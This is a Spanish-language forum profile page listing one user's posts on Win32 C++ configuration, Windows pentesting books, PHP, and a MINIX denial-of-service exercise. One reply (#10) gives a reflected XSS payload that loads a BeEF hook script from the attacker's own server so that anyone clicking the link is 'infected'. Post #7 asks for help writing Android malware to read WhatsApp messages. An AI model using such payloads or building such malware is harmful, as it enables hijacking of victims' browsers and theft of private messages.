Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - xkeycode

#1
Dudas y pedidos generales / Re:Recursos en win32
Junio 30, 2017, 12:43:35 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Realmente no entiendo tu duda, como te estamos diciendo creo que es justamente lo que pides, pero no se que es lo que no te cuadra, de hecho puedes configurar de varias maneras sin tener que usar un txt, tener una ip por default, y si alagien introduce alguna otra conectarse, pero creo que no nos estamos entendiendo
Pedona, ahora que leo los post soy yo el que no se ha explicado bien.
Lo que digo es que si alguien me puede dejar un post o decime como escribo en un txt almacenado en recursos de una aplicacion win32 como habeis comentado.
O lo de pisar la memoria del array, que no entiendo a que se refiere.
Muchas gracias
#2
Dudas y pedidos generales / Re:Recursos en win32
Junio 29, 2017, 05:38:19 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola! No tiene mucha logica que sea de esa manera, lo ideal es que cuando le pases el parámetro se ejecute con esa ip tal como te lo pase en el script anterior
Ejemplo:

Código: text

C:>miexe.exe -t 10.0.2.15
Conectando a 10.0.2.15


Caso contrario si quisieras de todas formas hacerlo como tú dices lo que podrías haces es que la funcion utilizada cuando le pasas el parámetro pise la memoria reservada para el array y le deje la nueva ip cuando ejecutas el programa. O algo más simple para empezar es que tengas un txt con una ip y luego cuando ejecutes la función "-t" haga un rw del archivo y se la cambie, una vez ejecutado eso podría seguir corriendo sin problemas.

Saludos.
Es que yo lo que quiero es poder configurar mi ejecutable de manera independiente.
La idea es que yo creo el ejecutable pero es el propio usuario el que configura el servidor, de esa manera, cada usuario tiene un servidor con ip diferente y para no tener que enviar el codigo fuente quisiera tener manera de cambiar la ip sin toar el codigo y enviarle el ejecutable especialmete configurado para su caso.
Como podria hacer para escribir en un archivo de recursos en c++ usando win32?
Muchas gracias por tu ayuda
#3
Dudas y pedidos generales / Re:Recursos en win32
Junio 28, 2017, 10:53:52 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Buenas noches xKeyCode, Que tal?

Podrías crear un array que utilice argumentos para pasarle los parámetros al momento de la ejecución del win32. No programo hace mucho pero todavia algo recuerdo ;)

Ejemplo burdo:

Código: c
include zaraza.lib .h etc..

int main(int argc, char *argv[]) {
    int i=entero-numero;
    if(argc < entero-menor-a-i) {
        printf("el parametro pasado ingreso a este bucle\n");
        exit(0);
    }
    for (cuentito) printf("el argumento que pasaste fue:",i,argv[i]);
    return(0);
}


Espero que te sirva,
Saludos.
Ya pero yo lo que necesito es lo siguiente:
Código: dos
C:\> miexe.exe
Conectando a IP 192.168.1.1
C:>miexe.exe -t 10.0.2.15
Ip cambiada
C:>miexe.exe
Conectando a IP 10.0.2.15


Es decir que sea persistente.
Gracias por tu atencion.
#4
¿Por que no usas JSON o XML para recibir los parametros desde el servidor y luego le haces un parse?
#5
Dudas y pedidos generales / Recursos en win32
Junio 27, 2017, 07:54:32 PM
Hola a todos,
Bien, la cosa es que estoy haciendo un proyecto en win32 con c++ y tengo un problema.
Mi aplicacion se conecta a un servidor, hasta ahi todo bien, pero puede ser que cambie el server, entonces lo que he hech es crear un txt en recursos que guarda algo tal que asi:

IP : <ipServidor>
......................
Mas datos
......................

La ip esta definida en el fichero, pero quiero que si el usuario ejecuta miExe.exe -t 192.168.1.1 actualize la ip en el archivo, asi no tengo que cambiarla yo y volver a compilar todo.
¿Alguien me puede decir como puedo hacer esto?, o aportame alguna idea?
Muchas gracias.
#6
Hola a todos,
alguien me puede recomendar algun buen libro para ir aprendiando pentestin contra windows, o por lo menos los fundamentos de este sistem(Terminos como las dll, UAC, Registro, etc..) todo ello orientado hacia la explotacion de este tipo de sistemas[Si trae snipets de codigo y demas pues mejor], le estaria muy agradecido.
Muchas gracias.
#7
Dudas y pedidos generales / Malware Android
Abril 23, 2017, 02:49:13 PM
Hola a todos,
Bien la cuestion es que llevo un tiempo desarrollando en android y se me habia ocurrido crear un malware para android, asi que lo 1º que s eme viene a al cabeza es whatsapp, queria saber como desde un apk podria interactual con whatsapp, aunque solo sea para leer los mensajes. Se quehabia una APi no oficial y que por problemas ya no esta.
Gracias a todos.
#8
Bueno, suponiendo que el  troyano se conecte a una ip privada(de tu propia red) si, seria posible saber la MAC del pc volcando la tabla arp y viendo cual es la MAC de la ip a la que se conecta, si no es imposible, solo tendrias una ip publica

Enviado desde mi Orange Hi 4G mediante Tapatalk

#9
Dudas y pedidos generales / Re:PHP comandos eval()
Agosto 30, 2016, 08:28:37 PM
A ver, no he entendido muy bien, creo que lo que quieres es poder visualizar tu la información del cliente, para ello debes guardarla en una base de datos(mirate conexiones a bases mysql desde php) y acceder a ella cuando quieras recuperar los datos.
Otra manera es mediante mail, yo en mi pagina web tengo algo muy similar a eso que me envía un e-mail a mi cuenta de correo utilizando phpMailer, si te interesa dímelo y te enseño el código(es muy sencillo).
No se si es esto lo que buscabas, si no lo es aclara un poco mas el tema para que podamos ayudarte.
Saludos


Enviado desde mi Orange Hi 4G mediante Tapatalk

#10
Eso que tu expones es que pop esta recibiendo una variable llamada id con un valor 33 por el método GET.
Para buscar una vulnerabilidad deberás encontrar la función que realiza esa variable,  y así poder probar tipos de ataques web. Si la variable se muestra por pantalla y no se filtra puedes intentar un ataque XSS reflejado tal que asi(php?id=<script src="tuservidor/hook.js"><script>)Hook.js es el anzuelo que utiliza Beef(un framework para hacer XSS, te recomiendo que lo mires),  con eso pasas la URL a usuarios y quien clicke estara infectado,  puedes mirar a ver si la utiliza la base de datos e incluir un SQLinyecton,  si sirve para incluir ficheros y puedes hacer un RFI o un LFI,etc...
Todo depende de para que use la web esa variable y sobre todo si se filtran correctamente o no.
Saludos.

Enviado desde mi Orange Hi 4G mediante Tapatalk

#11
Dudas y pedidos generales / Re:Ayuda con MINIX 3
Junio 15, 2016, 05:53:16 PM
No,  el exploit lo obtuve de exploit-db, pero el problema está en la configuración de mini,  que al hacer ifconfig me dice que error en /dev/ip , con lo cual creo que al ser un SO bastante antiguo igual requiere de unos ajustes iniciales para poder utilizar el adaptador de red.
Gracias por tu participación y si encuentro la solución la publicaré aquí.

Enviado desde mi Orange Hi 4G mediante Tapatalk

#12
Dudas y pedidos generales / Ayuda con MINIX 3
Junio 10, 2016, 05:30:11 AM
Hola,  gracias a todos de antemano.
La cuestión es que tengo que presentar un trabajo sobre ciberseguridad en MINIX 3 y se me ha ocurrido virtualizarlo y desde el host anfitrión ejecutar un exploit que descargue desde exploit-db para hacerle un DOS.
La cuestión es que lo virtualizo con qemu en Ubuntu y al hacer ifconfig en MINIX 3 me da error, con cual no se la ip contra la que lanzar el exploit.
Gracias a todos por vuestra atención.
Un saludo.

Enviado desde mi Orange Hi 4G mediante Tapatalk